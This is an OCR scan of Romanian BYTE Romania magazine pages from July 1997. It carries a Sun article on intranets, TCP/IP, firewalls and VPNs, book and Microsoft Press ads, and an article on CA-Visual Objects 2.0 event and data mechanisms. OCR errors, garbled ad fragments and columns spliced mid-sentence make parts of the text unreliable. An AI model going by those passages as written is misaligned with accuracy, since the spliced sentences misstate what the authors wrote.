au trebuit să deviriă experţi în protocoale de
rețea. În timpul primului şi celui de-al doilea
val al informatizării era folosit, în general,
în cadrul unei organizaţii, un singur proto-
col și acesta era un protocol proprietar uti-
lizat de main-frame-ul sau mini-calculatorul
existent. În unele cazuri, acest lucru a
reprezentat una din tehnicile folosite de pro-
ducători de a-și lega clienții de mediile pro-
prii.
În al treilea val al informatizării rețelele
au devenit din ce în ce mai complexe. Un
studiu realizat în anii 90 de 3Com, arată că
în majoritatea reţelelor rulează trei proto-
coale. Deoarece tehnologiile de rețea au
evoluat de la multiplexare prin „bridging“
către „routing“, această proliferare a pro-
tocoalelor a devenit o problemă majoră pen-
tru toți administratorii de rețea. Routerele
trebuie configurate astfel încât să permită
trecerea protocoalelor multiple și când apar
probleme în rețea îţi trebuie o groază de timp
pentru diagnosticare și restabilire. În mod
normal, dacă soluţiile de management, mul-
tiple, trebuie aplicate pentru fiecare fami-
lie de protocoale, atunci echipa care asigură
funcţionarea rețelei trebuie să fie mereu
prezentă și să cunoască toate protocoalele
folosite de rețeaua corporației.
Intranet-ul, fiind o extensie a Internetu-
lui, se bazează pe un singur protocol -
TCP/IP,
TCP/IP este o suită de cca 100 protocoale
diferite care au fost dezvoltate şi verificate
pe Internet. Avantajele acestuia constau în
rutare și comunicaţii „cap-la-cap“ fiabile,
între părțile componente.
Există multe aplicaţii excelente scrise
pentru Internet şi intranet, destinate să
ruleze pe TCP/IP, precum aplicaţiile de tele-
fonie în reţea, servere pentru transmisii
audio în rețea, video-conferințe și aplicaţii
colaborative de grup.
Folosind același limbaj pentru toate cal-
culatoarele dintr-o rețea, administrarea
acesteia devine mult mai ușoară. Un pro-
tocol din familia TCP/IP este SNMP (Sim-
ple Network Management Protocol). Mulţi
producători furnizează instrumente de
management foarte specializate pentru
SNMBP, care asigură administratorilor de
reţea o viziune unitară asupra întregii rețele
a corporației. Aceste sisteme de manage-
ment pot fi distribuite de-a lungul unei rețele
internaționale cu management ierarhizat,
instrumentele putând să asigure mana-
gementul fiecărui echipament sau calcula-
tor din rețea, indiferent că este server sau
stație de lucru, de la aceeaşi interfață. Sol-
stice, produsul SunSoft pentru management
de reţea, este unul dintre aceste instrumente,
utilizat de mii de organizații.
Produsul de management Solstice al Sun,
combinat cu produsele și serviciile Sostice
Partners furnizează o singură interfață de
management pentru întreaga rețea, asigu-
rând monitorizarea tuturor defecțiunilor
şi evenimentelor care pot apărea la fiecare
dintre echipamentele rețelei (infrastructură,
servere, stații de lucru) precum și manage-
„ mentul performanței, configurației, de soft-
ware, al datelor stocate, al activelor, al
aplicațiilor şi managementul securităţii
rețelei. Solstice oferă o serie de avantaje cum
sunt: management de reţea simplificat,
suport multi-vendor, un singur sistem de
management pentru întreaga rețea și econo-
mii financiare importante.
domeniul rețelelor de calculatoare
pornind de la tehnolopia hard:
parcurgând treptat calea spre vârtul acestara (nivelul ap
Subiectele abordate includ;
Nivelul fizic (firele de cupru, fibrele optice. comunicațiile radio şi cele prin satelit)
Nivelul legatura de date (principiile protocoalelor, HDLC, SLIP și PPP)
Subnivelul de acces la mediu (LAN-uri IEEE 802, punți, noile LAN-uri de mare viteză)
Nivelul retea (r . contolul congestiei, interconectarea retelelor, [Pv6)
Nivelul de transport neipiile protocoaielor de transport, TCP, performunta retelei)
Nivelul aplicație (eriptografia, poştă electronica. stiri, Web-ul, Java, multimedia)
In fiecare capitol sunt des jetaliu principiile de bază, urmate apoi de exemple ample luate din Internet,
îl ba a (E ali ratei
— Doresc să cumpăr cartea Rețele de ca
: V-am spalat la Banca (Banaba, filiala a în contul nr. 3100301 71 101 78, 70.000 lei
: Nomele și și prenumele:
Firma: ... oe
od postel/Localtae .
94 BYTE Romania. IULIE 1997
Bazele Intranet, în viziunea SUN
Intranet
Securitate
Pronunţaţi cuvântul „Internet“ în prezenţa
unui manager IT şi veţi constata că gândurile
acestuia se îndreaptă imediat către securi-
tate. Internet-ul, în afara părţilor sale
bune, este cunoscut ca un rai al hacker-ilor
şi mistificatorilor. Primul lucru care trebuie
avut în vedere este că un intranet nu tre-
buie să aibă nici o legătură fizică sau logică
cu Internet-ul; un intranet foloseşte numai,
o mare parte din tehnologiile utilizate în
Internet.
Un intranet poate avea asigurată o secu-
ritate cu mult mai ridicată decât au multe
sisteme interne. Toate serverele HTTP au
posibilitatea accesului utilizatorilor prin
nume şi parolă. În plus, este posibilă echi-
parea tuturor serverelor HTTP și browsere-
lor unei corporaţii cu tehnologii de criptare.
Cu costuri reduse, se poate realiza criptarea
pachetelor de date TCP/IP care sunt vehicu-
late prin rețeaua corporației. Acest nivel de
criptare este ridicat, având în vedere că se
asigură criptarea pachetului de date astfel
încât să poată fi citit numai de cel căruia i-a
fost destinat. Astfel, pot fi prevenite acțiu-
nile de spionaj comercial.
Acest tip de tehnologie este disponibil iar
nevoia de a atinge acest nivel de securitate
şi pe Internet a făcut ca software-ul să devi-
nă extrem de ieftin. Astfel, multe din
browserele comerciale sunt prevăzute cu
facilități de criptare.
Deşi un intranet nu necesită conectarea
la Internet, multe corporaţii au descoperit
avantajele pe care această interconectare le
poate aduce. Pentru corporaţii dispersate
pe arii geografice mari, sau care au nevoie
să comunice cu un anumit grup de utiliza-
tori externi, este mult mai uşor să-și supra-
pună rețeaua intranet peste Internet decât
să investească într-o rețea proprie compli-
cată sau să închirieze linii și modemuri.
Utilizatorilor aflați la distanţă li se poate
asigura accesul la sistemele corporației prin
Internet (prin folosirea unei linii locale
comutate) și prin utilizarea acelorași tehnici
de criptare şi de control al securităţii prin
care comunicațiile pot deveni neinteligibile
pentru comunitatea Internet. Un alt avantaj
al conectării intranetului la Internet este
acela că toți angajaţii pot avea acces la Inter-
net. Pe măsură ce Internetul s-a transformat
într-un mijloc de comunicare şi afaceri,
multe corporaţii utilizează Internetul pen-
tru activități de cercetare și marketing -
există peste 34 milioane de documente
disponibile pe Internet care conţin multe
informaţii utile. Există peste 500 de ziare cu
arhive complete care pot fi cercetate pre-
cum şi multe din sursele de informații uti-
lizate de mediile de afaceri (cum sunt Reu-
_ ters, Associated Press, Medline) si care
Zidul de protecție
sunt disponibile contra cost.
Totuși, orice legătură între sistemele cor-
poraţiei şi Internet comportă un risc major
din punct de vedere al securităţii. O dată
realizată această legătură, orice navigator
pe Internet poate teoretic să comunice cu
orice calculator din intranet care rulează
TCP/IP. Acest lucru impune deci existența
unui sistem de securitate între intranet și
internet, care să stabilească ce pachete de
date pot circula între cele două rețele. Un
asemenea sistem este cunoscut sub denu-
mirea de „firewall“. Un „firewall“este
implementat pe un calculator de mare pute-
re (uzual bazat pe UNIX) care rulează un
software relativ special și care este implan-
tat între rețeaua corporației și Internet. E
examinează fiecare pachet de date care trece
din intranet către Internet şi invers.
Sistemele de zid de protecţie „firewall“
sunt aplicaţii foarte inteligente care pot fi
setate să blocheze accesul. Deasemenea se
mai practică şi protejarea unei reţele cu o ie-
rarhie de firewall-uri.
Combinația dintre un intranet si Internet
este foarte avantajoasa pentru corporatiile
cu birouri situate în localităţi diverse. În mod
tradițional, comunicarea dintre oficii duce
după sine linii închiriate foarte scumpe sau
rețele complexe pentru transmisii de date
cu comutare de pachete. Cu toate oficiile
conectate la Internet printr-un firewall, se
pot transmite informaţii între acestea. Acest
tip de rețea este cunoscută sub denumirea
de „reţea privată virtuală“ (VRP).
În general, o linie închiriată pentru a
conecta o corporație la Internet implică cos-
turi mult mai mici decât o reţea WAN tradi-
ţională. Un studiu recent al US Computer
(http:/ / www.incog.com) arată că între-
prinderile pot economisi peste 35% din cos-
turile unui WAN folosind această soluţie. O
VPN devine mult mai sigură atunci când
sunt utilizate pentru securizare firewall-uri
criptate care, la ora actuală, sunt larg răspân-
dite. În acest scenariu, firewall-ul nu con-
trolează numai pachetele de date care cir-
culă intre intranet si Internet ci, în egală
măsură, şi pachetele de date destinate altor
companii.
Sun asigură 2 soluţii firewall - Firewall 1
v 2 (versiunea 3 în curs de apariție) este un
firewall de nivel TCP/IP proiectat să prote-
jeze fluxul de tranzacții ce au loc între Inter-
net și intranetul corporației. Criptarea se
poate adăuga produsului de bază, acest lucru
permiţând corporațiilor să-şi organizeze
rețele private peste Internet.
Altă gamă de firewall-uri Sun este Sun-
Screen SRE - 100, care foloseşte tehnologii
„ascunse“. Acesta este un dispozitiv de rețea
dedicat, invizibil în reţea. SunScreen SPF -
100 a fostales produsul anului 1996 pentru
categoria „cel mai bun firewall“ de către US
LAN Magazine.
Toate firewall-urile Sun sunt integrate
complet în sistemul de management de rețea
Solstice. Avantajele utilizării zidului de pro-
tecție sunt: accesul sigur la informaţiile cor-
poraţiei, criptarea reţelei -o garanţie în plus
pentru securitate, permite acces controlat
al oganizaţiilor asociate corporației, asigură
acces la Internet şi reduce costul liniilor
închiriate prin realizarea unor rețele private
virtuale (VPN) peste Internet.
Doamna Roxana Marin lucrează la firma Rom-
sys SA, care reprezintă firma Sun Microsys-
tems,Inc. în România. Poate fi contactată la
Tel: (01) 230.08.10 sau prin e-mail:
mktg Qromsys.ro.
JULIE 1997 BYTE Romania 95
iicrosofi Press «nows
Îţi lipsesc. Ti le-ai dori. Resursele pentru instruire si certificare
Microsoft. Norocul tau, Microsoft Press are solutia; seturile de
resurse și seturile de instruire în ritm propriu care te ajută să în veți despre
ceea ce ai nevoie, atunci când ai nevoie să știi. Indiferent că dorești să-ţi
per fec ti onezi cunoștințele anterioare sau să-ţi creezi un
program de instruire într-un ritm propriu, vei afla că mai
ai și timp pentru Viaţa ta.
Ewhesivty for Ommers uf the
Woulenns NT Server Resormve KR Version 4.0
2 : nee i :
Hands-On Training for Hands-On, Self-Paced
' Training for Microsoft
SOL Server Version 6.5.
Microsoft® Windows NT 4.0 Microsoft® SOL Server Server Microsoft? Windows NT? Microsoft® Windows NT®
Network Administration Training Training Server 4.0 Resource Kit Workstation 4.0 Resource Kit
1-57231-439-7 1-55615-930-7 1-57231-344-7 1-57231-343-9
Microsoft: Press
COMPS TER PRESS
Cartile pot fi rdsfoite, comandate și cumpărate de la librăria noastră deschisă la sediul firmei Forte Computers, str. Lipscani nr. 102: precum și de la
următoarele magazine din București: Flamingo Computers, Bd.N. Titulescu nr. 102: Computer House, str. Grigore Alexandrescu nr.47; Raffles Computers
Shop, Calea Victoriei nr.25; Librăria "Noi" sala Dales; Librăria Humanitas din Pasajul Creizulescu (lîngă magazinul Muzica): Craiova: INTERCAFENET,
Calea București A26 parter; Cluj. T&M Promedia, str. Doja nr.30
Puteţi comanda orice carte de la: Computer Press Agora s.r.[., C.P 94 0P49, București, fax: 01-3309285
Important: Lista completă de preţuri poate fi obținută via BBS 065-210780 (login: bbs, terminal: ANSI, ...}
Mecanisme automate în CA
Visual Objects 2.0
După lungi așteptări, s-a născut în sfarsit CA-Visual Objects 2.0 - mediu de dezvoltare com-
plet obiectual, pe 32 de biti, care oferă o cale posibilă pentru migrarea aplicaţiilor economice
xBase sub mediul Windows. Proiectat, în special, pentru dezvoltarea aplicaţiilor sofisticate în
medii client-server, CA-Visual Objects asigură o cale relativ ușoară de migrare de la DOS la
Windows, fără „șocuri culturale“.
De Istvân Lâszl6
De ce chiar CA-Visual Objects?
Odată cu răspândirea rapidă a calculatoarelor, din categoria PC-uri-
lor performante și a sistemelor de operare Windows, se impune, din
ce în ce mai pregnant, scrierea (respectiv transcrierea) aplicaţiilor
pentru mediul Windows. Cu toate că, afirmaţia conform căreia
„fiecare sistem de operare la locul lui este util“ pare corectă, nu se
pot contesta avantajele sistemului Windows, în ceea ce priveşte inter-
faţa spectaculoasă și intuitivă pe care o oferă chiar pentru „utiliza-
tori de ... câmpie“.
Din punctul de vedere al programatorilor, nu atât frumuseţea
interfeţei Windows este hotărâtoare în aprecierea mediului; pro-
babil că o pondere mult
mai mare are complexi-
tatea codului, care este
capabil să pună în fun-
-ctiune o aplicatie. Situa-
ţia contradictorie, adică
a cerințelor „naturale“
din partea utilizatorilor
(aparenţă deosebită, | + 5 Customer Explorer
help la fiecare nivel, pat
tabele, grafice, culori, eae
imagini, sunete - simpli- i fem 3 Help About
age
Ts ee
tate in folosire, interfa-
ta intuitiva, robustete, a, Menus
mesaje prietenoase, ...) i in Start
şi a „realităţii“ cunoscu-
te doar de programa- a “a Gteen Paget
be Li sapa
tori (arhitectură orien-
Repository Explorer (Group By Module)
Limbajul este complet compatibil cu CA-Clipper, doar aduce noutăți
în plus: se menţionează, în primul rând, extensia obiectuală com-
pletă, dar este semnificativă şi posibilitatea tipizării şi a definirii lex-
icale a variabilelor. (Aceste condiții din urmă reprezintă condiția
ca un limbaj să fie compilabil.) Modificările arhitecturale permit -
clădind pe clasele DataServer - exploatarea, în mod similar, a tu-
turor datelor care se prezintă sub formă tabelară, indiferent de for-
ma fizică de implementare, fie vorba de vectori multidimensionali,
de fişiere DBE, sau de datele obţinute în urma evaluării unei selecții
dintr-o bază de date SQL. În acest context, scalarea unei aplicaţii -
dacă acesta a fost proiectat corespunzător, nu mai prezintă o prob-
lemă chiar așa mare...
Fiind total optimizat,
pentru MS Windows
95/NT 4.0, CA-Visual
Objects suportă toate
controalele și convenții-
le specifice acestor sis-
teme de operare (la ni-
vel de cuvinte cheie:
Common Controls,
‘DDE, Clipboard, Drag-
éDrop; DEL; OLE
2.0). Mai mult, asigura
acces de nivel scazut la
APl-urile Win32.
Pe langa avantajele
arhitecturale si cele ca-
re provin din semanti-
ICONONE
ICONONE
ICONTWO:Irit
‘lconTwa
tata eveniment, cod
complex, mediu GUI sofisticat, cerinţe de securitate, siguranță şi
robusteţe) este soluţionată de diverse medii de programare pe diverse
căi.
Una din posibilităţi este calea oferită de CA-Visual Objects. Filo-
zofia limbajului nu este străină pentru utilizatorii de CA-Clipper,
fiindcă CA-Visual Objects se clădește pe principiile acestui limbaj.
Arhitectura aplicaţiilor reflectă inevitabil constrângerile impuse
de Windows: o arhitectură orientată eveniment.
CA-Visual Objects îmbină flexibilitatea limbajelor xBase şi sim-
plitatea modelării obiectuale cu un limbaj strict tipizat, într-un mediu
de dezvoltare complet - bazat pe un depozit activ intern de date, cu
un compilator optimizator nativ și link-editor incremental, cu gene-
ratoare (sau mai bine zis editoare) vizuale, și cu debugger puternic.
ca/sintaxa limbajului,
CA-Visual Objects oferă nişte mecanisme și funcționalități implicite.
Dezvoltarea aplicaţiilor se face de sus în jos, într-un mod iterativ;
astfel se asigură ca aplicaţia să fie tot timpul funcţională. Folosind
această abordare a creării rapide de prototipuri., „detalierea“ pro-
gramelor urmează o cale naturală.
Pentru a asigura o flexibilitate ridicată şi o extensibilitate ©
ușoară, sistemul are o arhitectură deschisă:
* bazat sau nu pe clasele sistem, se pot defini atât clase, cât şi con-
troale utilizator;
* se permite crearea noilor RDD-uri pentru accesarea diverselor
tipuri de baze de date;
* se asigură conectivitate la motoare SQL prin implementarea
tehnicii ODBC core, nivel 1şi nivel Il;
IULIE 1997 BYTE România 97
Medii de dezvoltare
= Push Button
.
Visual Objects 2.0
* se pot folosi funcţii, clase, metode (şi se
pot chiar genera...) biblioteci DLL;
* caşi în CA-Clipper, este posibilă definirea
unor comenzi utilizator (UDC);
* oferăsuport pentru comunicații între pro-
cese (DDE, Clipboard, OLE 2.0);
* nu numai funcționalitatea limbajului,
dar însuşi mediul de dezvoltare poate fi
extins - folosind CA-Visual Objects
Software Development Kit, documentatii
tehnice suplimentare, sau de unelte
„third-party“ disponibile pe piață.
Productivitate
Una din cerinţele cheie impuse pentru un lim-
baj, respectiv mediu de programare, este pro-
ductivitatea ridicată. Succesul unui produs
nou este sensibil influențat de calitatea limba-
jului, dar și de calitatea mediului de dezvol-
tare. În acest sens, problema productivităţii
poate fi defalcată în două capitole. Pe de o
parte, se caută răspunsul la întrebarea „Ce
oferă limbajul?“, iar, pe de altă parte, trebuie
conturat răspunsul dat la „Ce oferă mediul?“.
Din punctul de vedere al limbajului -
pornind de la CA-Clipper, evident - se asigu-
răcompatibilitate cu limbajele x Base, în mod
special cu „bunicul“ CA-Clipper. În acest sens,
se asigură o compatibilitate de 99%. Această
compatibilitate este teoretică, datorită fap-
tului că acesta se referă la așa zisa „business
logic“, adică la tot ceea ce nu este interfața uti-
lizator, ci ţine de logica programului.
Pe lângă această compatibilitate cu CA-
Clipper şi limbajele xBase, în general, limba-
jul oferă o serie de extensii. Cele mai impor-
tante sunt extensia obiectuală, precum şi
posibilitatea tipizării stricte şi a definirii lexi-
caleavariabilelor. Implicaţiile acestor extensii
sunt multiple. Productivitatea este afectată,
în primul rând, de faptul că editoarele vizuale
generează cod de înaltă calitate, bazat pe clase-
le predefinite ale sistemului. Pe de altă parte,
“posibilitatea tipizării şi a determinării lexicale
avalabilităţii variabilelor permite o compilare
98 BYTE Romania JULIE 1997
adevărată a programului sursă. Astfel, se
explică prezenţa unui compilator nativ. De
menționat că, chiar în cadrul aceleiași entități
(funcţie, procedură, metodă,...) se poate
amesteca codul tipizat cu cel netipizat. Acolo
unde este posibil, compilatorul generează cod
nativ, iar, acolo unde nu se poate, generează
pseudo-cod, care la execuţie se interpretează,
cala orice limbaj xBase „cumsecade“ (vezi CA-
Clipper, MS FoxPro,...).
Puterea mediului de dezvoltare se mani-
festa la utilizarea generatoarelor de cod. Da-
torita prezentei depozitului de date (reposi-
tory) activ multinivel, designul entitatii
editate - proiectul vizual - se păstrează pe ter-
men lung. Pe baza acestor proiecte, editoarele
generează, folosind clasele sistem, cod de.
CA-Visual Objects Menu Editor Tool
înaltă calitate. Codul generat nu numai că este
aproape optim, dar poate servi ca şi model
pentru programatori.
Nu este vorba chiar de un editor vizual,
dar în definiţia generatorului de cod intră
şi generatorul OLE Automation Server.
Arhitectura
Aparent fără implicaţii directe, faptul că lim-
bajul este obiectual iar arhitectura este orien-
tată eveniment, are efect asupra filozofiei ge-
nerale, ca urmare, şi asupra productivităţii.
Se pune întrebarea ce caracteristici are
„lipiciul“ care, din conglomeratul claselor și
a obiectelor, face până la urmă o aplicaţie
funcțională şi în ce măsură influențează aceas-
ta productivitatea. (Dacă nu din altceva, dar
măcar din acest text reiese importanţa.) Arhi-
tectura, poreclită mai înainte lipici, se mate-
rializează în setul de principii, pe baza căro-
ra se cladeste aplicaţia. Această arhitectură
impune uneltele și tehnicile folosite, fiind în .
acelașii timp determinată şi de componentele
(clasele) predefinite disponibile în sistem.
Analizând, din punctul de vedere al pro-
ductivităţii, principiile arhitecturale de bază,
se ajunge la analiza relaţiilor dintre clasele
şi obiectele aplicaţiei, precum și a mecanis-
melor automate asigurate de sistem.
Mecanisme automate
În concordanţă cu principiile abordării
obiectuale, sistemul CA-Visual Objects
oferă o aplicaţie-nucleu, numită „Standard
Application“, care este o aplicație minimală
cuo funcționalitate oarecare. Acesta este, în
principiu, punctul de pornire pentru dez-
voltarea unei aplicaţii reale. Funcţionali-
tatea acestei aplicaţii standard este dată, pe
de o parte, de arhitectura ei, iar, pe de altă
parte, de prezenţa claselor sistem cu un com-
portament bine cunoscut.
Unul din domeniile analizate, in acest arti-
col, se referă la aceste comportamente,
bar Pre
respectiv la mecanismele automate prezente .
în aplicaţia standard. Celălalt capitol al arti-
colului se referă la automatizările prezente în
mediul de dezvoltare prin generatoarele de
cod, accentuând rolul claselor sistem. După
cum am mai spus, extensibilitatea sistemu-
lui - prin arhitectura sa deschisă - joacă un rol
deosebit. Anumite căi de extindere a
funcționalităţii se bazează pe mecanisme
Visual Objects 2.0
Medii de dezvoltare
automate specifice.
Automatizări -
Aplicația Standard —
În cele ce urmează, analiza mecanismelor au-
tomate nu va urma O secvență logică. Încer-
căm să abordăm realitatea, de la simplu la
complex.
Cele mai importante implicaţii, asupra
mecanismelor automate, sunt cele arhitec-
turale, care se oglindesc și în comporta-
mentul claselor sistem. În acest sens, cea mai
importantă este „sistemul de mesagerie“,
adică dirijarea automată a evenimentelor
(mesajelor) între obiectele aplicaţiei.
Trebuie amintite - fără pretenţia de a tra-
ta complet subiectul - relaţiile care leagă com-
ponentele aplicaţiei. De menţionat că,
toate cele trei relaţii menţionate sunt de tip-
ul, 1-la-n“. Așa cum am mai menţionat, arhi-
tectura este totalitatea principiilor, legilor,
şi a relațiilor care determină modul de „com-
punere“ al obiectelor dintr-o aplicaţie, pre-
cum și legăturile dintre aceste obiecte.
Relaţia is a (este o/un). Este o relaţie care
defineşte arborele de moştenire între clase
în timpul compilării. Este o relaţie statică.
De menționat, că în CA-Visual Objects, se
permite nu numai moştenirea de la un sin-
gur strămoș. De exemplu un ComboBox
este de fapt un ListBox, care nu este altceva
decât un TextControl, care, la urma urmei,
nu este altceva decât un Control...
Relaţia has-a (are/posedă). Relaţia owner
se defineşte în momentul executării. Într-un
fel, arborele care se naşte, în urma acestei
relaţii dinamice, ia locul arhitecturii struc-
turate a aplicaţiilor clasice DOS. Exemplu:
ebug Green Pages
oNainWindow := Me =
oMainWVindow: Show
|
i
j
|
|
selt: Exec ()
// End of entity
aplicatia are o fereastra Shell, care are sub-
ferestre de date, care au atasate controale,
care la rândul lor...
Relaţia Client-Server uses-a (foloseşte
o/un). Se defineşte totîn momentul executării
şi în mod clasic leagă serverul de date de fe-
restrele de date. În CA-Visual Objects și aceas-
tă relație este 1-la-n, adică o fereastră de date
poate fi legată (în mod oficial și recunoscut
de mediu) doar de un singur server de date.
implicit al aplicaţiei, care distribuie eveni-
mentul ferestrei de care aparţine controlul
care a generat evenimentul (de exemplu,
apăsarea unui buton, sau selectarea unui
Mecanismele automate ale aplicaţiei stan-
dard se bazează, în mare parte, pe aceste
relaţii. (În cele ce urmează, informaţiile
prezentate sunt uşor simplificate, deci nu se
vor aminti toate laturile realităţii- în scopul
de a crea un model mai simplu şi de a per-
mite o înțelegere mai ușoară.)
1. Legarea prin nume -- eveniment-meto-
dă. În conceptul clasic, numai ferestrele sunt
contexte de evenimente, adică doar obiec-
tele care se trag din ferestre sunt capabile să
efectueze prelucrarea evenimentelor/me-
sajelor. (În cele ce urmează, nu vom mai face
distincţie între eveniment şi mesaj, deoarece
declanșarea unui eveniment atrage după
sine, inevitabil, şi lansarea unui mesaj cu
acelaşi nume - vezi deci primul mecanism
automat, care este atât de evident, că aproa-
pe nici nu a fost menţionat.)
Evenimentul, preluat de aplicaţia stan-
dard, ajunge la un dispecer de evenimente,
element dintr-un ListBox, sau modificarea
conținutului unui SingleLineEdit). Metodele
de tratare a evenimentelor aparţin (sunt pose-
date) de ferestre.
Identificarea metodei care trebuie invo-
cată se face prin nume. Adică, numele mesa-
jului este identic cu numele evenimentului,
care este identic cu numele simbolic al con-
trolului. (Legătura dintre declanșarea eveni-
mentului și generarea mesajului este total
transparentă, și în continuare, se face abs-
tracţie de aceasta. Mai mult, cititorul este
chiar rugat să uite de această dualitate.) Ca
urmare a evenimentului, se invocă metoda
cu același 1ume a ferestrei curente.
2. Derutarea evenimentelor. Totul decur-
ge aşa cum a fost descris mai înainte, dacă
metoda cu același nume, ca și evenimen-
tul/mesajul, există! Dacă nu există, eveni-
mentul este trimis, în mod automat, în sus
pe arborele owner (has-a), la posesorul fe-
restrei (contextului de evenimente) curente.
Aceasta, fiind la rândul ei tot un context de
evenimente, încearcă, din nou, identificarea
metodei cu același nume ca şi evenimentul.
Dacă acesta nu este definit, se repetă totul
pentru deținătorul ferestrei curente, și aşa
mai departe. În momentul în care eveni-
mentul a ajuns deja la obiectul-aplicaţie, care
de fapt stă pe vârful arborelui owner și nu
s-a identificat la nici un nivel metoda cores-
punzătoare, dispecerul de evenimente pro-
cedează în felul următor:
* se încercă, identificarea unei clase de feres-
tre, cu acelaşi nume, ca și evenimentul;
dacă există, se creează (şi se vizualizează)
o instanţă a clasei respective (adică un
obiect fereastră), cu fereastra shell a apli-
caţiei ca deținător;
* se încearcă identificarea unei clase report,
JULIE 1997 BYTE Romania 99
x
Medii de dezvoltare
Visual Objects 2.0
cu același nume ca și evenimentul; dacă
există, se crează (şi se vizualizează) o
instanţă a clasei respective (adică un
obiect report ), cu fereastra shell a apli-
caţiei ca deţinător;
* dacă nici una din condiţiile precedente nu
a fost satisfăcută, evenimentul dispare,
fără să se emite un mesaj de eroare.
Luând în considerare cele de mai sus,
devine clar de ce şi cum sistemul susține o
abordare top-down, respectiv de ce este
posibilă o proiectare iterativă a aplicaţiei.
3. Obiecte inteligente. Cu puțină exagera-
re, putem afirma că obiectele pot fi inteligen-
te: definind metodele NoMethod(), NoIVar-
Get() şi NoIVarPut(), controlul se transferă
acestor metode ori de câte ori se emite un
MDX compatibile, fie un motor SQL unde-
va in reţea; pe de altă parte oferă o interfa-
ță unică (vezi rolul şi avantajele izomorfis-
mului din modelul obiectual) surselor de
date. Prin această interfață comună, pro-
gramele devin independente de structura
concretă a datelor. Câmpurile DataSer-
ver-ului pot fi accesate şi prin nume.
Rămânând la ipoteza unui fişier DBF, dacă
structura acestuia nu este cunoscută în tim-
pul compilării, nu există altă soluţie: serverul
de date trebuie să se configureze - în funcţie
de structura fişierului - în timpul rulării apli-
caţiei. Într-adevăr, serverul de date îşi poate
modifica proprietăţile în timpul execuţiei.
Merită făcută observaţia că această auto-
configurare nu impune o modificare reală a
mesaj, căruia nu îi corespunde nici o metodă,
ori se încearcă citirea sau atribuirea de la o
variabilă de instanță nedefinită. Astfel, se
poate modifica sau extinde funcționalitatea
unui obiect dinamic, în momentul executării.
Cu toate că sarcina creării şi distrugerii
obiectelor este preluată de sistem, în unele
cazuri este nevoie de anumite iniţializări la
creare, respectiv de unele acțiuni de de-alo-
care la distrugerea obiectului în cauză. În acest
scop, se pot defini metodele Init() si Axit(),
care se invocă automat, imediat după crearea,
respectiv, imediat înainte de distrugerea
obiectului. Utilitatea acestor metode devine
evidentă în cazul în care obiectul conține la
rândul său, alte obiecte, care, înainte de
folosire, trebuie să fie iniţializate, respectiv,
resursele alocate trebuie să fie eliberate,
înainte de distrugerea obiectului gazdă.
4. DataServer - configurat în momentul
executării. Pentru accesarea datelor, sub
formă tabelară, se foloseşte clasa DataServ-
er. Aceasta este o coajă care înveleşte sursa
reală de date și are un rol dublu: pe de o
parte, ascunde implementarea concretă, for-
ma de manifestare fizică a datelor - fie tabel
în memorie, fie DBF local - CDX, NTX, sau
100 BYTE România IULIE 1997
structurii obiectului, ci se modifică numai
structura virtuală. Evident, s-a folosit un
mecanism asemănător celor prezentate în
paragraful precedent.
5. Legarea prin nume - DataWindow.
Ferestrele servesc la vizualizarea diverselor
date. Fereastra cea mai complexă ca şi
funcționalitate este DataWindow, adică fe-
reastra de date. Ca și orice altă fereastră, pe
suprafața DataWindiow pot fi aşezate
diverse controale. Controalele specializate
pentru vizualizarea datelor (deci, de exem-
plu SingleLineEdit, MultiLineEdit, Check-
Box, ListBox, ComboBox, RadioButton,
..) pot fi direct legate de campurile serveru-
lui de date atasat ferestrei.
Specificarea relaţiei uses-a, adică a relaţiei
client-server, dintre fereastră de date şi
serverul de date, se face printr-un simplu
apel al metodei Use(). Ca urmare a acestui
apel, controalele de date cu nume identice
cu câmpurile de date ale serverului se leagă,
adică, valoarea din controale reflectă valoa-
rea din sursa de date, și vice-versa.
6. FieldSpec. Toate informaţiile, care
determină un câmp de date, sunt colectate
într-un singur obiect numit FieldSpec. Pe
lângă descrierea tipului (N, C, L, D, M,
OLE) şi a lungimii câmpului, aici se găsesc
şi informaţiile de delimitare a domeniului
(lungime, domeniu, reguli de validare).
Avantajul folosirii acestor obiecte constă,
pe de o parte, într-o întreţinere mai simplă,
mai ușoară a aplicaţiei (descrierile se propa-
gă automat în toate locurile unde se folosește
FieldSpec-ul respectiv), iar, pe de altă par-
te, pe baza acestora funcţionează metodele
automate de validare a câmpurilor, atât la
nivelul serverelor de date cât și la nivelul
ferestrelor de date ataşate. 3
7. Vizualizarea datelor - = Atoll
Jobul cel mai important, dintr-o aplicaţie
economică, este de obicei vizualizarea date-
lor. Pentru acesta, fereastra de date oferă,
pe lângă legarea controalelor de câmpuri
prin nume, posibilitatea vizualizării auto-
mate a datelor (auto-layout în momentul
executării). Opţional, la legarea ferestrei de
un server (vezi metoda Use(), din paragraful
precedent) aceasta interoghează structura
sursei de date și îşi construieşte, conform
structurii serverului, două vederi: un For-
mView şi un BrowseView. Comutarea, între
cele două moduri la vizualizare, se face prin
trimiterea unui mesaj către fereastra reper
tivă de date.
Mai mult, regulile de validare a câm-
purilor sunt preluate, în mod automat, din
obiectele FieldSpec asociate câmpurilor.
8. Metode de navigare - Data Window.
Structura ferestrei de date, fie în FormView,
fie în BrowseView repetă structura serveru-
lui de date, cu observaţia că, fiecărui câmp
de date îi corespunde ori un control (de obi-
cei Single/MultiLineEdit sau CheckBox),
ori un obiect DataColumn. Ca similitudinea
să fie perfectă, însăși fereastra de date ascultă
de aceleași comenzi de navigare (GoTo,
GoTop, GoBottom, Skip, SkipPrevious,
Append, ...) ca si serverul de date.
9. Sub-ferestre de date. Ferestrele de date
sunt capabile sa lucreze cu sub-ferestre de
date, care au forma de manifestare asemănă-
toare cu un control complex, dar, la rândul
lor, sunt ferestre de date al căror server se
leagă de serverul de date al ferestrei-mamă,
prin relația SetSelectiveRelation. De altfel,
comportamentul sub-ferestrei este identic cu
comportamentul ferestrelor de date.
Încuibarea sub-ferestrelor nu este limitată sub
nici o formă (doar de genialitatea utiliza-
torului final și de dimensiunea ecranului).
Amenajarea legăturilor dintre servere,
respectiv datele vizualizate, se face în mod
automat de fereastra mamă.
10. Acces concurent. În medii de tip Win-
dows, programatorul (făcând abstracţie de
câteva cazuri fericite) este nevoit să-și
proiecteze aplicaţia special pentru exploa-
tare multiuser/multitasking, chiar dacă
Visual Objects 2.0
Medii de dezvoltare
este vorba de un calculator singuratic. Ca
urmare, se pune accent pe serviciile privind
modul de lucru concurent. Pentru preîn-
tâmpinarea greutăților, fereastra de date din
CA-Visual Objects oferă nişte mecanisme
predefinite de control al concurenţei. De
